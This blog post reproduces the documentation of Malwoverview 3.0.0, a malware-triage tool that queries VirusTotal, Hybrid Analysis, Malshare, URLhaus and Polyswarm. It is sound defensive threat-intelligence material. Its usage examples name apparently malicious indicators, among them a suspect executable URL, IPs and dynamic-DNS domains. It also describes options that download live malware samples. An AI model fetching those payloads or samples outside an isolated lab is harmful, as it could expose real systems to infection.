Channel: Blog – eForensics

Malwoverview 3.0.0 is available! | By Alexandre Borges

Malwoverview 3.0.0 is available!
command examples available on GitHub
Malwoverview is a first-response tool to perform an initial and quick triage of a directory containing malware samples, a specific malware sample, or suspect URLs and domains. Additionally, it allows you to download samples from, and send samples to, the main online sandboxes.

Version 3.0.0:

* Includes fixes in the URL reporting (-u option) from Virus Total.

* New players have been included in the URL reporting (-u option) from Virus Total.

* Fixes have been included in the payload listing (-K option) from URLhaus.

* Yara information has been included in the hash report (-m option) from Malshare.

* Fixes have been included in the -l option.

* New file types have been included in the -n option: Java, Zip, data, RAR, PDF, Composite (OLE), MS-DOS and UTF-8.

* New -W option, which shows URLs related to a user-provided tag from URLHaus.

* New -k option, which shows payloads related to a tag from URLHaus.

* New -I option, which shows information related to an IP address from Virus Total.

* The -R option was refactored and now supports searching for a file, IPv4 address, domain or URL on Polyswarm.

Malwoverview.py


(Gaps in the VT output in the image above are due to the public VT API key, which allows only 4 searches per minute.)


  Copyright (C)  2018-2020 Alexandre Borges <alexandreborges at blackstormsecurity dot com>

  This program is free software: you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation, either version 3 of the License, or
  (at your option) any later version.

  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details.

  See GNU Public License on <http://www.gnu.org/licenses/>.

Current Version: 3.0.0

Important note: Malwoverview does NOT submit samples to Virus Total or Hybrid Analysis by default. It submits only hashes, thus respecting Non-Disclosure Agreements (NDAs). Nonetheless, if you use the "-V" (uppercase), "-A" (uppercase) or "-P" (uppercase) options, Malwoverview SUBMITS your malware sample to Virus Total, Hybrid Analysis or Polyswarm, respectively.

ABOUT

Malwoverview.py is a simple tool to perform an initial and quick triage of malware samples, URLs and hashes. Additionally, Malwoverview is able to show some threat intelligence information.

This tool aims to:

  1. Determine similar executable malware samples (PE/PE+) according to the import table (imphash) and group them by color (pay attention to the second column of the output). Thus, colors matter!
  2. Show hash information from the Virus Total, Hybrid Analysis, Malshare, Polyswarm and URLhaus engines.
  3. Determine whether malware samples contain an overlay and, if you want, extract it.
  4. Check suspect files on Virus Total, Hybrid Analysis and Polyswarm.
  5. Check URLs on the Virus Total, Malshare, Polyswarm and URLhaus engines.
  6. Download malware samples from the Hybrid Analysis, Malshare and URLHaus engines.
  7. Submit malware samples to VirusTotal, Hybrid Analysis and Polyswarm.
  8. List the latest suspect URLs from URLHaus.
  9. List the latest payloads from URLHaus.
  10. Search for specific payloads on Malshare.
  11. Search for similar payloads (PE32/PE32+) on the Polyswarm engine.
  12. Classify all files in a directory by searching for information on Virus Total and Hybrid Analysis.
  13. Make reports about a suspect domain.
  14. Check APK packages directly from Android devices against Hybrid Analysis and Virus Total.
  15. Submit APK packages directly from Android devices to Hybrid Analysis and Virus Total.
  16. Show URLs related to a user-provided tag from URLHaus.
  17. Show payloads related to a tag (signature) from URLHaus.
  18. Show information about an IP address from Virus Total.
  19. Show IP address, domain and URL information from Polyswarm.
  20. List different types of payloads from Malshare along with their Yara hits.
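The imphash grouping in item 1 can be sketched in a few lines. The block below is a stdlib-only illustration of the idea behind pefile's get_imphash() (normalize each import to "dll.function" and MD5 the comma-joined list); it is not Malwoverview's actual code, and the sample import tables are made up:

```python
import hashlib

def imphash(imports):
    """Compute an imphash-style digest from (dll, function) pairs.

    Sketch of the idea behind pefile's get_imphash(): normalize each
    entry to 'dllname.function' (lowercase, DLL extension stripped)
    and MD5 the comma-joined list. Order matters, so two samples
    built from the same source usually share the hash.
    """
    parts = []
    for dll, func in imports:
        name = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if name.endswith(ext):
                name = name[: -len(ext)]
                break
        parts.append("%s.%s" % (name, func.lower()))
    return hashlib.md5(",".join(parts).encode()).hexdigest()

# Two samples with identical import tables group together (same color):
a = imphash([("KERNEL32.dll", "CreateFileA"), ("USER32.dll", "MessageBoxA")])
b = imphash([("kernel32.DLL", "createfilea"), ("user32.dll", "messageboxa")])
print(a == b)  # True: normalization makes the hashes match
```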

REQUIREMENTS

This tool has been tested on Ubuntu, Kali Linux 2020, Windows 8.1 and 10. Malwoverview can be installed by executing the following command:

    $ pip3.8 install malwoverview                     (Linux)
    C:\> python.exe -m pip install malwoverviewwin    (Windows)

On Linux systems, add /usr/local/bin to the PATH environment variable.

Additionally, insert your API keys into the configmalw.py file in the /usr/local/lib/python3.x/dist-packages/malwoverview/conf directory (Linux) or the C:\Python37\Lib\site-packages\malwoverviewwin\conf directory (Windows).

On Windows systems, when the package is installed using pip, it is no longer necessary to specify "-w 1".

To check the installation, execute:

   (Linux) malwoverview --help
   (Windows) malwoverview.py --help

If you are installing Malwoverview into a Python virtual environment, you should follow the step-by-step procedure below:

   $ mkdir mytest
   $ python3.8 -m venv mytest/
   $ source mytest/bin/activate
   $ cd mytest/
   $ pip3.8 -q install malwoverview
   $ cd bin
   $ pip3.8 show malwoverview
   $ ls ../lib/python3.8/site-packages/malwoverview/conf/
   $ cp /malwoverview/configmalw.py ../lib/python3.8/site-packages/malwoverview/conf/
   $ malwoverview

Further information is available on:

   (Linux) https://pypi.org/project/malwoverview/
   (Windows) https://pypi.org/project/malwoverviewwin/
   (Github) https://github.com/alexandreborges/malwoverview

If you prefer to perform the installation manually, a few steps are necessary:

Kali Linux

  1. Python version 3.8 or later (Python 3.x only! It does NOT work with Python 2.7)
    $ apt-get install python3.8  (for example)
    
  2. Python-magic. To install the python-magic package, you can execute the following command:
    $ pip3.8 install python-magic
    

    Or compile it from the GitHub repository:

    $ git clone https://github.com/ahupp/python-magic
    $ cd python-magic/
    $ python3.8 setup.py build
    $ python3.8 setup.py install
    

    As there are serious problems caused by the coexistence of two versions of the python-magic package, my recommendation is to install it from GitHub (the second procedure above) and copy the magic.py file into the SAME directory as the malwoverview tool.

  3. Install several Python packages:
    $ pip3.8 install -r requirements.txt
    
    OR
    
    $ pip3.8 install pefile
    $ pip3.8 install colorama
    $ pip3.8 install simplejson
    $ pip3.8 install python-magic
    $ pip3.8 install requests
    $ pip3.8 install validators
    $ pip3.8 install geocoder
    $ pip3.8 install polyswarm-api
    
  4. To check an Android device you need to install the "adb" program by executing the following command:
    # apt-get install adb
    

    PS: before trying the Android options, check:

    * Whether the adb program is listed in the PATH environment variable.
    * Whether the system has authorized access to the device, by using "adb devices -l".
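As an aside, the file-type identification that python-magic performs (and which backs Malwoverview's file-type handling, such as the -n filters) boils down to matching magic bytes at the start of a file. Below is a stdlib-only sketch of that idea with a tiny, illustrative subset of signatures; it is not python-magic's real database or API:

```python
# Minimal magic-byte sniffer: a stdlib-only sketch of what python-magic
# does via libmagic. The signature table is a tiny illustrative subset.
SIGNATURES = [
    (b"MZ", "PE32 executable (MS-DOS stub)"),
    (b"\x7fELF", "ELF"),
    (b"%PDF", "PDF document"),
    (b"PK\x03\x04", "Zip archive data"),
    (b"Rar!\x1a\x07", "RAR archive data"),
    (b"dex\n", "Dalvik dex file"),
]

def sniff(data):
    # Return the label of the first matching signature, or "data"
    # (libmagic's own fallback name) when nothing matches.
    for prefix, label in SIGNATURES:
        if data.startswith(prefix):
            return label
    return "data"

print(sniff(b"MZ\x90\x00..."))   # PE32 executable (MS-DOS stub)
print(sniff(b"%PDF-1.7 ..."))    # PDF document
```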
    

Windows

  1. Install the Python version 3.8.x or later from https://www.python.org/downloads/windows/
  2. Python-magic. To install the python-magic package, you can execute the following command:
    C:\> python.exe -m pip install python-magic
    

    Or compile it from the GitHub repository:

    C:\> git clone https://github.com/ahupp/python-magic
    C:\> cd python-magic/
    C:\> python.exe setup.py build
    C:\> python.exe setup.py install
    
  3. Install several Python packages:
    C:\> python.exe -m pip install -r requirements.txt
    
    OR: 
    
    C:\> python.exe -m pip install pefile
    C:\> python.exe -m pip install colorama
    C:\> python.exe -m pip install simplejson
    C:\> python.exe -m pip install python-magic
    C:\> python.exe -m pip install requests
    C:\> python.exe -m pip install validators
    C:\> python.exe -m pip install geocoder
    C:\> python.exe -m pip install polyswarm-api
    C:\> python.exe -m pip install python-magic-bin==0.4.14
    
  4. (IMPORTANT) Remove the magic.py file from malwoverview directory.
  5. (VERY IMPORTANT) Install the python-magic DLLs by executing the following command:
    C:\> python.exe -m pip install python-magic-bin==0.4.14 
    
  6. To check an Android device you need to install the "adb" program by:
    * Downloading and installing the Android Studio from: https://developer.android.com/studio#downloads (Recommended)
    * Downloading it from https://dl.google.com/android/repository/platform-tools-latest-windows.zip
    

    PS: before trying the Android options, check:

    * Whether the adb program is listed in the PATH environment variable.
    * Whether the system has authorized access to the device, by using "adb devices -l".
    

Virus Total, Hybrid-Analysis, Malshare, URLHaus and Polyswarm engines

You must edit the configmalw.py file (Linux: the /usr/local/lib/python3.x/dist-packages/malwoverview/conf directory; Windows: the C:\Python37\Lib\site-packages\malwoverviewwin\conf directory) and insert your API keys to enable all engines. Pay attention: the API keys are not registered within malwoverview.py anymore!

  VT: 

        VTAPI = '<----ENTER YOUR API HERE---->'

  Hybrid-Analysis: 

        HAAPI = '<----ENTER YOUR API HERE---->'    

  Malshare: 

        MALSHAREAPI = '<----ENTER YOUR API HERE---->'

  HAUSUrl:

        HAUSSUBMITAPI = '<----ENTER YOUR API HERE---->'

  Polyswarm.IO:

        POLYAPI = '<----ENTER YOUR API HERE---->'
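As an illustration of how these engines are consumed, the block below sketches a lookup against the URLhaus query API (the service behind the -U option), using only the Python standard library. The endpoint is URLhaus' documented v1 URL-query endpoint; the helper names are my own, and this is not Malwoverview's actual code:

```python
import json
import urllib.parse
import urllib.request

# Documented URLhaus endpoint for querying a single URL.
URLHAUS_API = "https://urlhaus-api.abuse.ch/v1/url/"

def build_request(url):
    # URLhaus expects an HTTP POST with the looked-up URL in a form
    # field named 'url'; the response body is JSON.
    data = urllib.parse.urlencode({"url": url}).encode()
    return urllib.request.Request(URLHAUS_API, data=data, method="POST")

def check_url(url):
    # Performs the network call and decodes URLhaus' JSON verdict.
    with urllib.request.urlopen(build_request(url), timeout=30) as resp:
        return json.load(resp)

# Example (requires network access):
#   report = check_url("http://example.com/payload.exe")
#   print(report.get("query_status"))  # 'ok' if URLhaus knows the URL, else 'no_results'
```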

USAGE

To use malwoverview, execute the command as shown below:

  root@ubuntu19:~/malwoverview# python3.8 malwoverview.py  | more

  usage: python malwoverview.py -d <directory> -f <fullpath> -i <0|1> -b <0|1> -v <0|1> -a <0|1> 
  -p <0|1> -s <0|1> -x <0|1> -w <0|1> -u <url> -H <hash file> -V <filename> -D <0|1> -e<0|1|2|3|4>
  -A <filename> -g <job_id> -r <domain> -t <0|1> -Q <0|1> -l <0|1> -n <1-12> -m <hash> -M <0|1> 
  -U <url> -S <url> -z <tags> -B <0|1> -K <0|1> -j <hash> -J <hash> -P <filename> -N <url> 
  -R <PE file, IP address, domain or URL> -G <0|1|2|3|4> -y <0|1> -Y <file name> -Z <0|1> 
  -X <0|1> -T <file name> -W <tag> -k <signature> -I <ip address>

Malwoverview is a malware triage tool written by Alexandre Borges.

  optional arguments:

  -h, --help        show this help message and exit
  -d DIRECTORY, --directory DIRECTORY
                    specify directory containing malware samples.
  -f FILENAME, --filename FILENAME
                    Specifies a full path to a file. Shows general information about the file (any filetype)
  -b BACKGROUND, --background BACKGROUND
                    (optional) Adapts the output colors to a white terminal. The default is a black terminal.
  -i IAT_EAT, --iat_eat IAT_EAT
                    (optional) Shows imports and exports (it is used with -f option).
  -x OVERLAY, --overlay OVERLAY
                    (optional) Extracts overlay (it is used with -f option).
  -s SHOW_VT_REPORT, --vtreport SHOW_VT_REPORT
                    Shows antivirus reports from the main players. This option is used with the -f option (any filetype).
  -v VIRUSTOTAL, --virustotal VIRUSTOTAL
                    Queries the Virus Total database for positives and totals. Thus, you need to edit configmalw.py 
                    and insert your VT API key.
  -a HYBRID_ANALYSIS, --hybrid HYBRID_ANALYSIS
                    Queries the Hybrid Analysis database for a general report. Use the -e option to specify which 
                    environment you are looking for, because the sample may have been submitted to a 
                    different environment than the one you are checking. Thus, you need to edit configmalw.py 
                    and insert your HA API key and secret.
  -p USE_VT_PUB_KEY, --vtpub USE_VT_PUB_KEY
                    (optional) You should use this option if you have a public Virus Total API. It forces a one 
                    minute wait every 4 malware samples, but allows obtaining a complete evaluation of the 
                    malware repository.
  -w RUN_ON_WINDOWS, --windows RUN_ON_WINDOWS
                    This option is used when the OS is Microsoft Windows.
  -u URL_VT, --vturl URL_VT
                    SUBMITS a URL for Virus Total scanning.
  -I IP_VT, --ipaddrvt IP_VT
                    This option checks an IP address on Virus Total.
  -r URL_DOMAIN, --urldomain URL_DOMAIN
                    GETS a domain's report from Virus Total.
  -H FILE_HASH, --hash FILE_HASH
                    Specifies the hash to be checked on Virus Total and Hybrid Analysis. For the Hybrid Analysis
                    report you must use it together with the -e option.
  -V FILENAME_VT, --vtsubmit FILENAME_VT
                    SUBMITS a FILE (up to 32MB) to Virus Total for scanning and reads the report. Attention: use 
                    forward slashes to specify the target file even on Windows systems. Furthermore, the minimum 
                    waiting time is set to 90 seconds because of the Virus Total queue. If an error occurs, wait 
                    a few minutes and try to access the report by using the -f option.
  -A SUBMIT_HA, --submitha SUBMIT_HA
                    SUBMITS a FILE (up to 32MB) to be scanned by the Hybrid Analysis engine. Use the -e option to
                    specify the best environment to run the suspicious file.
  -g HA_STATUS, --hastatus HA_STATUS
                    Checks the status of samples submitted to the Hybrid Analysis engine by providing the 
                    job ID. Possible returned status values are: IN_QUEUE, SUCCESS, ERROR, IN_PROGRESS and 
                    PARTIAL_SUCCESS.
  -D DOWNLOAD, --download DOWNLOAD
                    Downloads the sample from Hybrid Analysis. Option -H must be specified.
  -e HA_ENVIRONMENT, --haenv HA_ENVIRONMENT
                    This option specifies the environment to be used to test the sample on Hybrid Analysis:
                    <0> Windows 7 32-bit; <1> Windows 7 32-bit (with HWP support); <2> Windows 7 64-bit; 
                    <3> Android; <4> Linux 64-bit. This option is used together with either the -H, -A 
                    or -a option.
  -t MULTITHREAD, --thread MULTITHREAD
                    (optional) This option forces multithreading on Linux when: the -d option is specified
                    AND you have a PAID Virus Total API, or you are NOT checking VT while using the -d option.
                    PS1: using this option causes the imphashes not to be grouped anymore; PS2: it also works on 
                    Windows, but there is no gain in performance.
  -Q QUICK_CHECK, --quick QUICK_CHECK
                    This option should be used with the -d option in two scenarios: 1) either including the -v option
                    (Virus Total -- you'll see a complete VT response if you have the private API) for a 
                    multithreaded search and reduced output; 2) or including the -a option (Hybrid Analysis) for a
                    multithreaded search and complete output. If you are using the -a option, the -e option
                    can also be used to adjust the output to your sample types. PS1: if you have a directory
                    holding many malware samples, you will certainly want to test this option with the -a option;
                    PS2: it also works on Windows, but there is no gain in performance.
  -l MALSHARE_HASHES, --malsharelist MALSHARE_HASHES
                    Shows hashes from the last 24 hours from Malshare. You need to insert your Malshare API key 
                    into the configmalw.py file.
  -m MALSHARE_HASH_SEARCH, --malsharehash MALSHARE_HASH_SEARCH
                    Searches for the provided hash on the Malshare repository. You need to insert your Malshare API
                    key into the configmalw.py file. PS: sometimes the Malshare website is unavailable, so you
                    should check the website's availability if you get an error message.
  -n FILE_TYPE, --filetype FILE_TYPE
                    Specifies the file type to be listed by the -l option. Therefore, it must be used together with
                    the -l option. Possible values: 1: PE32 (default) ; 2: Dalvik ; 3: ELF ; 4: HTML ; 5: ASCII ; 
                    6: PHP ; 7: Java ; 8: RAR ; 9: Zip ; 10: UTF-8 ; 11: MS-DOS ; 12: data ; 13: PDF ; 
                    14: Composite (OLE).
  -M MALSHARE_DOWNLOAD, --malsharedownload MALSHARE_DOWNLOAD
                    Downloads the sample from Malshare. This option must be specified with -m option.
  -B URL_HAUS_BATCH, --haus_batch URL_HAUS_BATCH
                    Retrieves a list of recent URLs (last 3 days, limited to 1000 entries) from URLHaus website.
  -K HAUS_PAYLOADS, --haus_payloadbatch HAUS_PAYLOADS
                    Retrieves a list of downloadable links to recent PAYLOADS (last 3 days, limited to 1000 
                    entries) from the URLHaus website. Take care: each link downloads a password-less zip file
                    containing malware, so your AV may generate alerts!
  -U URL_HAUS_QUERY, --haus_query URL_HAUS_QUERY
                    Queries a URL on the URLHaus website.
  -j HAUS_HASH, --haus_hash HAUS_HASH
                    Queries a payload's hash (md5 or sha256) on the URLHaus website.
  -S URL_HAUS_SUB, --haus_submission URL_HAUS_SUB
                    Submits a URL used to distribute malware (executable, script, document) to the URLHaus website.
                    Pay attention: any other submission will be ignored/deleted by URLhaus. You have to register
                    your URLHaus API key in the configmalw.py file.
  -z [HAUSTAG [HAUSTAG ...]], --haustag [HAUSTAG [HAUSTAG ...]]
                    Associates tags (separated by spaces) with the specified URL. Please note: only upper case, 
                    lower case, '-' and '.' are allowed. This parameter is optional and can be used with the 
                    -S option.
  -W [HAUSTAGSEARCH [HAUSTAGSEARCH ...]], --haustagsearch [HAUSTAGSEARCH [HAUSTAGSEARCH ...]]
                    This option searches for malicious URLs by tag on URLhaus. Tags are case-sensitive and only
                    upper case, lower case, '-' and '.' are allowed.
  -k [HAUSSIGSEARCH [HAUSSIGSEARCH ...]], --haussigsearch [HAUSSIGSEARCH [HAUSSIGSEARCH ...]]
                    This option searches for malicious payloads by tag on URLhaus. Tags are case-sensitive and
                    only upper case, lower case, '-' and '.' are allowed.
  -J HAUS_DOWNLOAD, --haus_download HAUS_DOWNLOAD
                    Downloads a sample (if it is available) from the URLHaus repository. It is necessary to provide
                    the SHA256 hash.
  -P POLYSWARMFILE, --polyswarm_scan POLYSWARMFILE
                    (Only for Linux) Performs a file scan using the Polyswarm engine.
  -N POLYSWARMURL, --polyswarm_url POLYSWARMURL
                    (Only for Linux) Performs a URL scan using the Polyswarm engine.
  -O POLYSWARMHASH, --polyswarm_hash POLYSWARMHASH
                    (Only for Linux) Performs a hash scan using the Polyswarm engine.
  -R POLYSWARMMETA, --polyswarm_meta POLYSWARMMETA
                    (Only for Linux) Performs a complementary search for similar PE executables through 
                    meta-information or IP addresses using the Polyswarm engine. This parameter depends on
                    the -G parameter, so please check it.
  -G METATYPE, --metatype METATYPE
                    (Only for Linux) This parameter specifies whether the -R option will gather information about
                    the PE executable or IP address using the Polyswarm engine. Thus, 0: PE Executable ;
                    1: IP Address ; 2: Domains ; 3: URL.
  -y ANDROID_HA, --androidha ANDROID_HA
                    Checks all third-party APK packages from the USB-connected Android device against Hybrid
                    Analysis using multithreads. The Android device does not need to be rooted, and you need to
                    have adb in your PATH environment variable.
  -Y ANDROID_SEND_HA, --androidsendha ANDROID_SEND_HA
                    Sends a third-party APK package from your USB-connected Android device to Hybrid Analysis. The
                    Android device does not need to be rooted, and you need to have adb in your PATH environment
                    variable.
  -T ANDROID_SEND_VT, --androidsendvt ANDROID_SEND_VT
                    Sends a third-party APK package from your USB-connected Android device to Virus Total. The 
                    Android device does not need to be rooted, and you need to have adb in your PATH environment
                    variable.
  -Z ANDROID_VT, --androidvt ANDROID_VT
                    Checks all third-party APK packages from the USB-connected Android device against VirusTotal 
                    using the public API (slower because of the 60-second delay for every 4 hashes). The Android
                    device does not need to be rooted, and you need to have adb in your PATH environment variable.
  -X ANDROID_VT, --androidvtt ANDROID_VT
                    Checks all third-party APK packages from the USB-connected Android device against VirusTotal 
                    using multithreads (only for the private Virus Total API). The Android device does not need to
                    be rooted, and you need to have adb in your PATH environment variable.


    If you use the Virus Total, Hybrid Analysis, Malshare, URLHaus or Polyswarm options, it is necessary
    to edit the configmalw.py file and insert your API keys. 

    Remember that the public VT API only allows 4 searches per minute (as shown in the image above). Therefore,
    if you are willing to wait some minutes, you can use the -p option, which forces a one-minute wait 
    every 4 malware samples, but allows obtaining a complete evaluation of the repository.
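The -p throttle described above can be sketched as follows; the function name and the injectable sleep parameter are my own illustration, not Malwoverview's implementation:

```python
import time

def throttled(items, batch=4, pause=60, sleep=time.sleep):
    """Yield items, pausing `pause` seconds after every `batch` of them.

    Mirrors the idea behind -p: the public Virus Total API allows only
    4 lookups per minute, so wait one minute after each group of 4.
    `sleep` is injectable so the schedule can be tested without waiting.
    """
    for i, item in enumerate(items, start=1):
        yield item
        if i % batch == 0 and i < len(items):
            sleep(pause)

# Record when the throttle would sleep instead of actually sleeping:
pauses = []
hashes = ["h%d" % n for n in range(10)]
processed = list(throttled(hashes, sleep=pauses.append))
print(len(processed), pauses)  # 10 [60, 60]
```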


    * ATTENTION 1: if the directory contains many malware samples while using the -d option, malwoverview.py
                   could take some time. Nonetheless, you can use the new -t option (multithreading) to
                   speed things up. :)
     
    ** ATTENTION 2: All engines enforce quotas on submissions and/or verifications per day and/or month. 
                    Take care!
    
    *** ATTENTION 3: Some Hybrid Analysis search options strongly depend on the "-e" option, which 
                     specifies the environment. Therefore, to check an Android sample (for example) it is 
                     necessary to use the right environment (-e 3 for Android).
    
    **** ATTENTION 4: When you execute Malwoverview on Windows systems, you MUST specify the "-w 1" option.

Examples:

  python3.8 malwoverview.py -d /root/malware/misc/
  python3.8 malwoverview.py -d /root/malware/misc/ -t 1
  python3.8 malwoverview.py -d /root/malware/misc/ -t 1 -v 1
  python3.8 malwoverview.py -d /root/malware/misc/ -v 1 -p 1
  python3.8 malwoverview.py -d /root/malware/misc/ -Q 1 -v 1
  python3.8 malwoverview.py -d /root/malware/misc/ -Q 1 -a 1
  python3.8 malwoverview.py -d /root/malware/android/ -Q 1 -a 1 -e 3
  python3.8 malwoverview.py -d /root/malware/linux/ -Q 1 -a 1 -e 4
  python3.8 malwoverview.py -f /root/malware/misc/sample1 -v 1 -s 1
  python3.8 malwoverview.py -f /root/malware/misc/sample1 -i 1
  python3.8 malwoverview.py -f /root/malware/misc/sample1 -v 1 -s 1 -x 1
  python3.8 malwoverview.py -u <url>
  python3.8 malwoverview.py -r <domain>
  python3.8 malwoverview.py -H <hash> -e 2
  python3.8 malwoverview.py -H <hash> -e 1
  python3.8 malwoverview.py -V /root/malware/android/sample.apk
  python3.8 malwoverview.py -A /root/malware/windows/sample1
  python3.8 malwoverview.py -A /root/malware/android/sample.apk -e 3
  python3.8 malwoverview.py -g <job_id>
  python3.8 malwoverview.py -l 1
  python3.8 malwoverview.py -l 1 -n 2
  python3.8 malwoverview.py -l 1 -n 3
  python3.8 malwoverview.py -m <hash>
  python3.8 malwoverview.py -m <hash> -M 1
  python3.8 malwoverview.py -B 1
  python3.8 malwoverview.py -U <URL>
  python3.8 malwoverview.py -K 1
  python3.8 malwoverview.py -j <hash>
  python3.8 malwoverview.py -J <hash>
  python3.8 malwoverview.py -S <URL> -z SpelevoEK exe psixbot
  python3.8 malwoverview.py -O <hash>
  python3.8 malwoverview.py -N <URL>
  python3.8 malwoverview.py -P sample1
  python3.8 malwoverview.py -R /root/malware/windows/sample1
  python3.8 malwoverview.py -y 1
  python3.8 malwoverview.py -Y skype
  python3.8 malwoverview.py -Z 1
  python3.8 malwoverview.py -X 1
  python3.8 malwoverview.py -T twitter 
  python3.8 malwoverview.py -u https://toulousa.com/omg/159EYJSFYHMS.exe
  python3.8 malwoverview.py -k Trickbot
  python3.8 malwoverview.py -m e47a415662b5fad1f3049764456ba2ac33a1bde6fd3181ec2b658d382ad17d41
  python3.8 malwoverview.py -W mirai
  python3.8 malwoverview.py -I 149.56.79.215
  python3.8 malwoverview.py -R 164.132.92.180 -G 1
  python3.8 malwoverview.py -R sndoffo79.ddns.net -G 2
  python3.8 malwoverview.py -R http://t.turconfiok.pro -G 3
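Several of the examples above rely on overlay handling (-x). The idea behind overlay detection is simple: anything in the file past the end of the last PE section is overlay. Below is a small sketch under that assumption (section offsets and sizes are supplied already parsed; this is not the tool's actual code):

```python
def overlay_offset(sections, file_size):
    """Return the file offset where overlay data begins, or None.

    `sections` is a list of (PointerToRawData, SizeOfRawData) pairs as
    parsed from the PE section headers; anything in the file past the
    furthest section end is overlay. A sketch of the idea behind -x.
    """
    if not sections:
        return None
    end = max(ptr + size for ptr, size in sections)
    return end if file_size > end else None

# A 5000-byte file whose last section ends at 4096 carries 904 overlay bytes:
print(overlay_offset([(0x400, 0x600), (0xA00, 0x600)], 5000))  # 4096
print(overlay_offset([(0x400, 0x600)], 0x400 + 0x600))         # None
```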

HISTORY

Version 3.0.0:

  This version:
  
        * Includes fixes in the URL reporting (-u option) from Virus Total.  
        * New players have been included in the URL reporting (-u option) from Virus Total.
        * Fixes have been included in the payload listing (-K option) from URLhaus.
        * Yara information has been included in the hash report (-m option) from Malshare.
        * Fixes have been included in the -l option. 
        * New file types have been included in the -n option: Java, Zip, data, RAR, PDF, Composite (OLE), MS-DOS
          and UTF-8.
        * New -W option, which shows URLs related to a user-provided tag from URLHaus.
        * New -k option, which shows payloads related to a tag from URLHaus.
        * New -I option, which shows information related to an IP address from Virus Total.
        * The -R option was refactored and now supports searching for a file, IPv4 address, domain or URL on Polyswarm. 

Version 2.5.0:

  This version:
  
        * Introduces the following options:
              * -y to check all third-party APKs from an Android device against 
                   Hybrid Analysis. 
              * -Y to send a third-party APK from an Android device to Hybrid
                   Analysis. 
              * -Z to check all third-party APKs from an Android device against 
                   Virus Total. 
              * -X to check all third-party APKs from an Android device against
                   Virus Total (a private API is necessary). 
              * -T to send a third-party APK from an Android device to Virus Total. 
        * Fixes several issues related to color in command outputs.  
        * Adds the filename identification in the report while sending a sample to Virus Total.

Version 2.1.9.1:

  This version:
  
        * Fixes several issues about colors in outputs. 
        * Removes the -L option from Malshare (unfortunately, Malshare no longer provides a 
          URL list). 
        * Removes the -c option.
        * Introduces some verification lines in the URLHaus command. 

Version 2.1:

  This version:
  
        * Fixes formatting issues related to Hybrid Analysis output (-Q 1 -a 1). 
        * Fixes color issues. 
        * Fixes small issues related to Polyswarm. 

Version 2.0.8.1:

  This version:
  
        * Introduces installation using: pip3.8 install malwoverview (Linux) or 
          python -m pip install malwoverviewwin (Windows). 
        * Fixes small problems related to Polyswarm usage. 
        * Changes the help to verify whether the APIs were inserted into configmalw.py file. 

Version 2.0.1:

  This version:
  
        * Fixes a problem related to searching by hash on Malshare (-m option). 
        * Fixes a problem related to searching by hash on Polyswarm (-O option). 

Version 2.0.0:

  This version:
  
        * Introduces a completely ported version of Malwoverview to Python 3.x (it does not work in 
          Python 2.7.x anymore!)
        * Fixes several bugs related to IAT/EAT listing. 
        * Fixes several bugs related to colors. 
        * Introduces multi-threading to some options. 
        * Introduces several options related to Malshare. 
        * Introduces several options related to URLHaus.
        * Introduces several options related to Polyswarm engine. 
        * Changes the place of the API key configuration. Now you should edit the configmalw.py file. 
        * Changes the help libraries and functions, making Malwoverview's help more complete. 
        * Introduces geolocation feature by using the package named Geocoder written by Dennis Carrierre.
        * Fixes problems related to Hybrid Analysis engine. 
        * Fixes several mistakes related to mixing spaces and tabs.
        * Extends the -d option to include Hybrid Analysis. 

Version 1.7.5:

  This version: 
  
        * Fixes a problem related to sample submission to Hybrid Analysis on Windows operating 
          systems. Additionally, file name handling has also been fixed. 

Version 1.7.3:

  This version: 
  
        * Malwoverview has been adapted to API version 2.6.0 of Hybrid Analysis.
        * -A option has been fixed according to new version (2.6.0) of Hybrid Analysis.
        * -a option has been modified to work together with  -e option.
        * help information has been modified. 

Version 1.7.2:

  This version: 
  
        * A small fix related to -g option has been included. 

Version 1.7.1:

  This version: 
  
        * Relevant fix of a problem related to the -A and -H options.
        * Includes a new Hybrid Analysis environment to the -e option (Windows 7 32-bits with HWP support).
        * Updates the Malwoverview to support Hybrid Analysis API version 2.5.0.

Version 1.7.0:

  This version: 
  
        * Includes -A option for submitting a sample to Hybrid Analysis.
        * Includes -g option for checking the status of a sample submission to Hybrid Analysis.
        * Includes -e option for specifying the testing environment on the Hybrid Analysis.
        * Includes -r option for getting a complete domain report from Virus Total.
        * Modifies the -H option to work together with the -e option.
        * Modifies several functions of the tool to prepare it for version 1.8.0

Version 1.6.3:

  This version: 
  
        * Includes the creation of new functions aiming at the 1.7.0 version.
        * Includes new exception handling blocks.

Version 1.6.2:

  This version: 
  
        * Includes small fixes.
        * For Hybrid Analysis API version 2.4.0, it is no longer necessary to include the API Secret.  

Version 1.6.1:

  This version: 
  
        * Includes small format fixes.

Version 1.6.0:

  This version: 
  
        * It uses the Hybrid Analysis API version 2.4.0.
        * Includes certificate information in the Hybrid Analysis report. 
        * Includes MITRE information in the Hybrid Analysis report. 
        * Includes an option to download samples from Hybrid Analysis. 

Version 1.5.1:

  This version: 
  
        * Small change to fix format issue in -d option. 

Version 1.5.0:

  This version: 
  
        * Includes the -u option to check URLs against Virus Total and associated engines. 
        * Includes the -H option to find existing reports on Virus Total and Hybrid Analysis through the hash.
        * Includes the -V option to submit a file to Virus Total. Additionally, the report is shown after a few
          minutes.
        * Includes two small fixes. 

Version 1.4.5.2:

  This version:

        * Includes two small fixes.

Version 1.4.5.1:

  This version:

        * Includes one small fix. 

Version 1.4.5:

  This version:
  
        * Adds the -w option to use malwoverview in Windows systems.
        * Improves and fixes colors when using the -b option on a black background.

Version 1.4:

  This version:

        * Adds the -a option for getting the Hybrid Analysis summary report.
        * Adds the -i option for listing imported and exported functions. Therefore, the imported/exported
          function report was decoupled into a separate option.

Version 1.3:

  This version:

        * Adds the -p option for public Virus Total API.

Version 1.2:

  This version includes:

        * evaluates a single file (any filetype)
        * shows PE sections.
        * shows imported functions.
        * shows exported functions.
        * extracts overlay.
        * shows AV report from the main players. (any filetype)

Version 1.1:

  This version:

        * Adds the VT checking feature.

Version 1.0:

Malwoverview is a tool to perform a first triage of malware samples in a directory and group them
according to their import functions (imphash) using colors. This version:

* Shows the imphash information classified by color.
* Checks whether malware samples are packed.
* Checks whether malware samples have overlay.
* Shows the entropy of the malware samples.
